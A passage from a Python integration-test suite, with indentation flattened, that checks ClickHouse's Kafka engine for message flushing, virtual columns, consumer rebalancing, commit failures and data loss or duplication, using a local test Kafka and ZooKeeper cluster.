messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('mmv', messages)
while True:
result1 = instance.query('SELECT * FROM test.view1')
result2 = instance.query('SELECT * FROM test.view2')
if kafka_check_result(result1) and kafka_check_result(result2):
break
instance.query('''
DROP TABLE test.consumer1;
DROP TABLE test.consumer2;
DROP TABLE test.view1;
DROP TABLE test.view2;
''')
kafka_check_result(result1, True)
kafka_check_result(result2, True)
@pytest.mark.timeout(300)
def test_kafka_flush_on_big_message(kafka_cluster):
# Create batches of messages, each ~100 KB
kafka_messages = 1000
batch_messages = 1000
messages = [json.dumps({'key': i, 'value': 'x' * 100}) * batch_messages for i in range(kafka_messages)]
kafka_produce('flush', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush',
kafka_group_name = 'flush',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
client = KafkaAdminClient(bootstrap_servers="localhost:9092")
received = False
while not received:
try:
offsets = client.list_consumer_group_offsets('flush')
for topic, offset in offsets.items():
if topic.topic == 'flush' and offset.offset == kafka_messages:
received = True
break
except kafka.errors.GroupCoordinatorNotAvailableError:
continue
while True:
result = instance.query('SELECT count() FROM test.view')
if int(result) == kafka_messages*batch_messages:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert int(result) == kafka_messages*batch_messages, 'ClickHouse lost some messages: {}'.format(result)
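# The offset-polling loop above can be bounded; a sketch over the same
# kafka-python KafkaAdminClient API (the helper name is hypothetical):
def wait_for_committed_offset(group, topic, target_offset, timeout=120):
    client = KafkaAdminClient(bootstrap_servers="localhost:9092")
    deadline = time.time() + timeout
    while time.time() < deadline:
        try:
            offsets = client.list_consumer_group_offsets(group)
        except kafka.errors.GroupCoordinatorNotAvailableError:
            # the group coordinator may not be elected yet right after startup
            time.sleep(1)
            continue
        for tp, offset_meta in offsets.items():
            if tp.topic == topic and offset_meta.offset >= target_offset:
                return True
        time.sleep(1)
    return False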
@pytest.mark.timeout(180)
def test_kafka_virtual_columns(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt1',
kafka_group_name = 'virt1',
kafka_format = 'JSONEachRow';
''')
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('virt1', [messages], 0)
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('virt1', [messages], 0)
result = ''
while True:
result += instance.query('SELECT _key, key, _topic, value, _offset, _partition, _timestamp FROM test.kafka', ignore_error=True)
if kafka_check_result(result, False, 'test_kafka_virtual1.reference'):
break
kafka_check_result(result, True, 'test_kafka_virtual1.reference')
@pytest.mark.timeout(180)
def test_kafka_virtual_columns_with_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2',
kafka_group_name = 'virt2',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64, kafka_key String, topic String, offset UInt64, partition UInt64, timestamp Nullable(DateTime))
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT *, _key as kafka_key, _topic as topic, _offset as offset, _partition as partition, _timestamp as timestamp FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('virt2', messages, 0)
while True:
result = instance.query('SELECT kafka_key, key, topic, value, offset, partition, timestamp FROM test.view')
if kafka_check_result(result, False, 'test_kafka_virtual2.reference'):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True, 'test_kafka_virtual2.reference')
@pytest.mark.timeout(180)
def test_kafka_insert(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert1',
kafka_group_name = 'insert1',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
messages = []
while True:
messages.extend(kafka_consume('insert1'))
if len(messages) == 50:
break
result = '\n'.join(messages)
kafka_check_result(result, True)
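# The INSERT retry-on-timeout loop above reappears in test_kafka_produce_consume
# below; a consolidation sketch (the helper name is hypothetical):
def kafka_insert_with_retries(query):
    # librdkafka can time out a produce request under load; retrying the whole
    # INSERT is safe in these tests because they only check final row counts
    while True:
        try:
            instance.query(query)
            return
        except QueryRuntimeException as e:
            if 'Local: Timed out.' in str(e):
                continue
            raise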
@pytest.mark.timeout(240)
def test_kafka_produce_consume(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert2',
kafka_group_name = 'insert2',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages_num = 10000
def insert():
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
threads = []
threads_num = 16
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result) == messages_num * threads_num:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(300)
def test_kafka_commit_on_block_write(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
cancel = threading.Event()
i = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(101):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce('block', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
while int(instance.query('SELECT count() FROM test.view')) == 0:
time.sleep(1)
cancel.set()
instance.query('''
DROP TABLE test.kafka;
''')
while int(instance.query("SELECT count() FROM system.tables WHERE database='test' AND name='kafka'")) == 1:
time.sleep(1)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
''')
while int(instance.query('SELECT uniqExact(key) FROM test.view')) < i[0]:
time.sleep(1)
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.view'))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
@pytest.mark.timeout(180)
def test_kafka_virtual_columns2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="virt2_0", num_partitions=2, replication_factor=1))
topic_list.append(NewTopic(name="virt2_1", num_partitions=2, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
CREATE TABLE test.kafka (value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2_0,virt2_1',
kafka_group_name = 'virt2',
kafka_num_consumers = 2,
kafka_format = 'JSONEachRow';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT value, _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp), toUnixTimestamp64Milli(_timestamp_ms), _headers.name, _headers.value FROM test.kafka;
''')
producer = KafkaProducer(bootstrap_servers="localhost:9092")
producer.send(topic='virt2_0', value=json.dumps({'value': 1}), partition=0, key='k1', timestamp_ms=1577836801001, headers=[('content-encoding', b'base64')])
producer.send(topic='virt2_0', value=json.dumps({'value': 2}), partition=0, key='k2', timestamp_ms=1577836802002, headers=[('empty_value', ''),('', 'empty name'), ('',''), ('repetition', '1'), ('repetition', '2')])
producer.flush()
time.sleep(1)
producer.send(topic='virt2_0', value=json.dumps({'value': 3}), partition=1, key='k3', timestamp_ms=1577836803003, headers=[('b', 'b'),('a', 'a')])
producer.send(topic='virt2_0', value=json.dumps({'value': 4}), partition=1, key='k4', timestamp_ms=1577836804004, headers=[('a', 'a'),('b', 'b')])
producer.flush()
time.sleep(1)
producer.send(topic='virt2_1', value=json.dumps({'value': 5}), partition=0, key='k5', timestamp_ms=1577836805005)
producer.send(topic='virt2_1', value=json.dumps({'value': 6}), partition=0, key='k6', timestamp_ms=1577836806006)
producer.flush()
time.sleep(1)
producer.send(topic='virt2_1', value=json.dumps({'value': 7}), partition=1, key='k7', timestamp_ms=1577836807007)
producer.send(topic='virt2_1', value=json.dumps({'value': 8}), partition=1, key='k8', timestamp_ms=1577836808008)
producer.flush()
time.sleep(10)
members = describe_consumer_group('virt2')
#pprint.pprint(members)
assert members[0]['client_id'] == u'ClickHouse-instance-test-kafka-0'
assert members[1]['client_id'] == u'ClickHouse-instance-test-kafka-1'
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
expected = '''\
1 k1 virt2_0 0 0 1577836801 1577836801001 ['content-encoding'] ['base64']
2 k2 virt2_0 0 1 1577836802 1577836802002 ['empty_value','','','repetition','repetition'] ['','empty name','','1','2']
3 k3 virt2_0 1 0 1577836803 1577836803003 ['b','a'] ['b','a']
4 k4 virt2_0 1 1 1577836804 1577836804004 ['a','b'] ['a','b']
5 k5 virt2_1 0 0 1577836805 1577836805005 [] []
6 k6 virt2_1 0 1 1577836806 1577836806006 [] []
7 k7 virt2_1 1 0 1577836807 1577836807007 [] []
8 k8 virt2_1 1 1 1577836808 1577836808008 [] []
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(240)
def test_kafka_produce_key_timestamp(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka_writer (key UInt64, value UInt64, _key String, _timestamp DateTime)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.kafka (key UInt64, value UInt64, inserted_key String, inserted_timestamp DateTime)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT key, value, inserted_key, toUnixTimestamp(inserted_timestamp), _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp) FROM test.kafka;
''')
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(1,1,'k1',1577836801))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(2,2,'k2',1577836802))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({})),({},{},'{}',toDateTime({}))".format(3,3,'k3',1577836803,4,4,'k4',1577836804))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(5,5,'k5',1577836805))
time.sleep(10)
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
# print(result)
expected = '''\
1 1 k1 1577836801 k1 insert3 0 0 1577836801
2 2 k2 1577836802 k2 insert3 0 1 1577836802
3 3 k3 1577836803 k3 insert3 0 2 1577836803
4 4 k4 1577836804 k4 insert3 0 3 1577836804
5 5 k5 1577836805 k5 insert3 0 4 1577836805
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(600)
def test_kafka_flush_by_time(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_time',
kafka_group_name = 'flush_by_time',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce('flush_by_time', messages)
time.sleep(1)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
time.sleep(18)
result = instance.query('SELECT count() FROM test.view')
print(result)
cancel.set()
kafka_thread.join()
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# 40 = 2 flushes (7.5 sec each), 15 polls each, about 1 msg per 1.5 sec
assert int(result) > 12, 'Messages from kafka should be flushed at least every stream_flush_interval_ms!'
@pytest.mark.timeout(600)
def test_kafka_flush_by_block_size(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_block_size',
kafka_group_name = 'flush_by_block_size',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
SELECT * FROM test.kafka;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for _ in range(101):
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce('flush_by_block_size', messages)
time.sleep(1)
# TODO: due to https://github.com/ClickHouse/ClickHouse/issues/11216
# second flush happens earlier than expected, so we have 2 parts here instead of one
# flush by block size works correctly, so the feature checked by the test is working correctly
result = instance.query("SELECT count() FROM test.view WHERE _part='all_1_1_0'")
# print(result)
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# 100 = first poll should return 100 messages (and rows)
# not waiting for stream_flush_interval_ms
assert int(result) == 100, 'Messages from kafka should be flushed as soon as kafka_max_block_size is reached!'
@pytest.mark.timeout(600)
def test_kafka_lot_of_partitions_partial_commit_of_bulk(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="topic_with_multiple_partitions2", num_partitions=10, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions2',
kafka_group_name = 'topic_with_multiple_partitions2',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 211;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
count = 0
for dummy_msg in range(1000):
rows = []
for dummy_row in range(random.randrange(3,10)):
count = count + 1
rows.append(json.dumps({'key': count, 'value': count}))
messages.append("\n".join(rows))
kafka_produce('topic_with_multiple_partitions2', messages)
time.sleep(30)
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
print(result)
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(count) )
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
@pytest.mark.timeout(1200)
def test_kafka_rebalance(kafka_cluster):
NUMBER_OF_CONCURRENT_CONSUMERS = 11
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# kafka_cluster.open_bash_shell('instance')
#time.sleep(2)
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="topic_with_multiple_partitions", num_partitions=11, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
cancel = threading.Event()
msg_index = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(59):
messages.append(json.dumps({'key': msg_index[0], 'value': msg_index[0]}))
msg_index[0] += 1
kafka_produce('topic_with_multiple_partitions', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
for consumer_index in range(NUMBER_OF_CONCURRENT_CONSUMERS):
table_name = 'kafka_consumer{}'.format(consumer_index)
print("Setting up {}".format(table_name))
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
CREATE TABLE test.{0} (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions',
kafka_group_name = 'rebalance_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 33;
CREATE MATERIALIZED VIEW test.{0}_mv TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp,
'{0}' as _consumed_by
FROM test.{0};
'''.format(table_name))
# kafka_cluster.open_bash_shell('instance')
while int(instance.query("SELECT count() FROM test.destination WHERE _consumed_by='{}'".format(table_name))) == 0:
print("Waiting for test.kafka_consumer{} to start consume".format(consumer_index))
time.sleep(1)
cancel.set()
# leave the last consumer running on purpose (to finish consuming after all the rebalances)
for consumer_index in range(NUMBER_OF_CONCURRENT_CONSUMERS - 1):
print("Dropping test.kafka_consumer{}".format(consumer_index))
instance.query('DROP TABLE IF EXISTS test.kafka_consumer{}'.format(consumer_index))
while int(instance.query("SELECT count() FROM system.tables WHERE database='test' AND name='kafka_consumer{}'".format(consumer_index))) == 1:
time.sleep(1)
# print(instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination'))
# kafka_cluster.open_bash_shell('instance')
while True:
messages_consumed = int(instance.query('SELECT uniqExact(key) FROM test.destination'))
if messages_consumed >= msg_index[0]:
break
time.sleep(1)
print("Waiting for finishing consuming (have {}, should be {})".format(messages_consumed,msg_index[0]))
print(instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination'))
# Some queries to debug...
# SELECT * FROM test.destination where key in (SELECT key FROM test.destination group by key having count() <> 1)
# select number + 1 as key from numbers(4141) left join test.destination using (key) where test.destination.key = 0;
# SELECT * FROM test.destination WHERE key between 2360 and 2370 order by key;
# select _partition from test.destination group by _partition having count() <> max(_offset) + 1;
# select toUInt64(0) as _partition, number + 1 as _offset from numbers(400) left join test.destination using (_partition,_offset) where test.destination.key = 0 order by _offset;
# SELECT * FROM test.destination WHERE _partition = 0 and _offset between 220 and 240 order by _offset;
# CREATE TABLE test.reference (key UInt64, value UInt64) ENGINE = Kafka SETTINGS kafka_broker_list = 'kafka1:19092',
# kafka_topic_list = 'topic_with_multiple_partitions',
# kafka_group_name = 'rebalance_test_group_reference',
# kafka_format = 'JSONEachRow',
# kafka_max_block_size = 100000;
#
# CREATE MATERIALIZED VIEW test.reference_mv Engine=Log AS
# SELECT key, value, _topic,_key,_offset, _partition, _timestamp, 'reference' as _consumed_by
# FROM test.reference;
#
# select * from test.reference_mv left join test.destination using (key,_topic,_offset,_partition) where test.destination._consumed_by = '';
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.destination'))
for consumer_index in range(NUMBER_OF_CONCURRENT_CONSUMERS):
print("kafka_consumer{}".format(consumer_index))
table_name = 'kafka_consumer{}'.format(consumer_index)
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
'''.format(table_name))
instance.query('''
DROP TABLE IF EXISTS test.destination;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
@pytest.mark.timeout(1200)
def test_kafka_no_holes_when_write_suffix_failed(kafka_cluster):
messages = [json.dumps({'key': j+1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce('no_holes_when_write_suffix_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'no_holes_when_write_suffix_failed',
kafka_group_name = 'no_holes_when_write_suffix_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = ReplicatedMergeTree('/clickhouse/kafkatest/tables/no_holes_when_write_suffix_failed', 'node1')
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(1);
''')
# The tricky part here is that the disconnect should happen after the write prefix but before
# the write suffix, so we use sleepEachRow to stretch the insert out.
with PartitionManager() as pm:
time.sleep(12)
pm.drop_instance_zk_connections(instance)
time.sleep(20)
pm.heal_all()
# The connection is restored, but it will take a while until the next block is flushed;
# it takes ages on CI :\
time.sleep(90)
# Since it's a bit tricky to hit the proper moment, check the logs to confirm that we did.
assert instance.contains_in_log("ZooKeeper session has been expired.: while write prefix to view")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
print(result)
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('22\t22\t22')
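# Timing sketch for the sleepEachRow trick above (derived from the settings in this test):
# with kafka_max_block_size = 20 and sleepEachRow(1), the first block of 20 rows spends
# roughly 20 s inside the materialized-view insert. Dropping the ZooKeeper connection at
# t ~= 12 s therefore lands inside that window: after the write prefix (the insert has
# started) but before the write suffix (the block has not been committed yet), which is
# exactly the failure point this test needs to hit.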
@pytest.mark.timeout(120)
def test_exception_from_destructor(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query_and_get_error('''
SELECT * FROM test.kafka;
''')
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query('''
DROP TABLE test.kafka;
''')
# kafka_cluster.open_bash_shell('instance')
assert TSV(instance.query('SELECT 1')) == TSV('1')
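# What the test above appears to exercise: the failed SELECT leaves the Kafka consumer in a
# state where its destructor can throw during DROP TABLE. If that exception escaped, the
# server would terminate; recreating and dropping the table and then running a plain
# SELECT 1 confirms the server survived both destruction paths.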
@pytest.mark.timeout(120)
def test_commits_of_unprocessed_messages_on_drop(kafka_cluster):
messages = [json.dumps({'key': j+1, 'value': j+1}) for j in range(1)]
kafka_produce('commits_of_unprocessed_messages_on_drop', messages)
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000;
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
while int(instance.query("SELECT count() FROM test.destination")) == 0:
print("Waiting for test.kafka_consumer to start consume")
time.sleep(1)
cancel = threading.Event()
i = [2]  # one-element list so the producer thread can mutate the shared counter
def produce():
while not cancel.is_set():
messages = []
for _ in range(113):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce('commits_of_unprocessed_messages_on_drop', messages)
time.sleep(1)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
time.sleep(12)
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10000;
''')
cancel.set()
time.sleep(15)
# kafka_cluster.open_bash_shell('instance')
# SELECT key, _timestamp, _offset FROM test.destination where runningDifference(key) <> 1 ORDER BY key;
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.destination')
print(result)
instance.query('''
DROP TABLE test.kafka_consumer;
DROP TABLE test.destination;
''')
kafka_thread.join()
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(i[0]-1)), 'Missing data!'
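# A note on the i = [2] pattern used above: the producer thread mutates a one-element list
# because a plain integer assignment inside produce() would rebind a local name instead of
# updating the shared counter. A minimal Python 3 sketch of the same idea using `nonlocal`
# (illustrative only; make_producer and produce_batch are hypothetical names):
def make_producer(start=2):
    counter = start
    def produce_batch(batch_size=113):
        nonlocal counter  # mutate the enclosing counter instead of a shared list cell
        batch = [json.dumps({'key': k, 'value': k}) for k in range(counter, counter + batch_size)]
        counter += batch_size
        return batch
    return produce_batch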
@pytest.mark.timeout(120)
def test_bad_reschedule(kafka_cluster):
messages = [json.dumps({'key': j+1, 'value': j+1}) for j in range(20000)]
kafka_produce('test_bad_reschedule', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000;
CREATE MATERIALIZED VIEW test.destination Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
while int(instance.query("SELECT count() FROM test.destination")) < 20000:
print("Waiting for consume")
time.sleep(1)
assert int(instance.query("SELECT max(consume_ts) - min(consume_ts) FROM test.destination")) < 8
@pytest.mark.timeout(1200)
def test_kafka_duplicates_when_commit_failed(kafka_cluster):
messages = [json.dumps({'key': j+1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce('duplicates_when_commit_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'duplicates_when_commit_failed',
kafka_group_name = 'duplicates_when_commit_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.5);
''')
# print(time.strftime("%m/%d/%Y %H:%M:%S"))
time.sleep(12)  # ~5-6 s to connect to Kafka, subscribe, and fetch 20 rows; another ~10 s for the MV; after that the commit should happen
# print(time.strftime("%m/%d/%Y %H:%M:%S"))
kafka_cluster.pause_container('kafka1')
# That timeout is VERY important and was picked after a lot of experiments.
# When it is too low (<30 s), librdkafka will not report any timeout (the alternative is to decrease librdkafka's default session timeouts).
# When it is too high (>50 s), the broker will decide to remove us from the consumer group and will start answering "Broker: Unknown member".
time.sleep(40)
# print(time.strftime("%m/%d/%Y %H:%M:%S"))
kafka_cluster.unpause_container('kafka1')
# kafka_cluster.open_bash_shell('instance')
# The connection is restored, but it will take a while until the next block is flushed;
# it takes ages on CI :\
time.sleep(30)
